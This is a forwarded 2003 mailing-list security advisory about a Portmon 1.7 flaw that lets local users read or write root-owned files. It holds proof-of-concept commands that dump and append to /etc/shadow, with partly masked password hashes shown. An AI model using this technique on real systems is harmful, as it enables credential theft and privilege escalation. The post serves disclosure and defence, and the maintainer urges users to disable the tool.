[Please disable portmon and upgrade as soon as a fix is available if you have portmon installed -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Message-ID: <[EMAIL PROTECTED]> From: David Hancock <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: Portmon file arbitrary read/write access vulnerability Date: Tue, 17 Jun 2003 14:47:40 -0700 Package: Portmon Auth: http://www.aboleo.net/ Version(s): 1.7 (prior ?) Vulnerability: File arbitrary read/write access vulnerability Portmon is a network service monitoring daemon (http://www.aboleo.net/software/portmon/). "In order to use ping support, Portmon must run as root or be installed setuid with root permissions due to the fact that it must open up a raw socket." The product suffer from a security problem that allows any local user to read/write protected files on the system. This is dude to a hole in the way the program handles loading of two configuration files: host file/log file. Example (read): [EMAIL PROTECTED] lucae]$portmon -c /etc/shadow Unable to resolve hostname root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7::: Unable to resolve hostname bin:*:12172:0:99999:7::: Unable to resolve hostname daemon:*:12172:0:99999:7::: Unable to resolve hostname adm:*:12172:0:99999:7::: Unable to resolve hostname lp:*:12172:0:99999:7::: Unable to resolve hostname sync:*:12172:0:99999:7::: Unable to resolve hostname shutdown:*:12172:0:99999:7::: Unable to resolve hostname halt:*:12172:0:99999:7::: Unable to resolve hostname mail:*:12172:0:99999:7::: Unable to resolve hostname news:*:12172:0:99999:7::: <snip> Example (write): [EMAIL PROTECTED] lucae]$portmon -l /etc/shadow fopen: No such file or directory Failed reading config file hosts [EMAIL PROTECTED] root]#cat /etc/shadow <snip> lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7::: nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7::: test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7::: (Mon Jun 16 01:40:17 2003) - Portmon started by user lucae //line added [EMAIL PROTECTED] root]# Luca Ercoli luca.ercoli[at]inwind.it ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves ------------------------------------------------------- This SF.Net email is sponsored by: INetU Attention Web Developers & Consultants: Become An INetU Hosting Partner. Refer Dedicated Servers. We Manage Them. You Get 10% Monthly Commission! INetU Dedicated Managed Hosting http://www.inetu.net/partner/index.php _______________________________________________ linux-india-help mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/linux-india-help
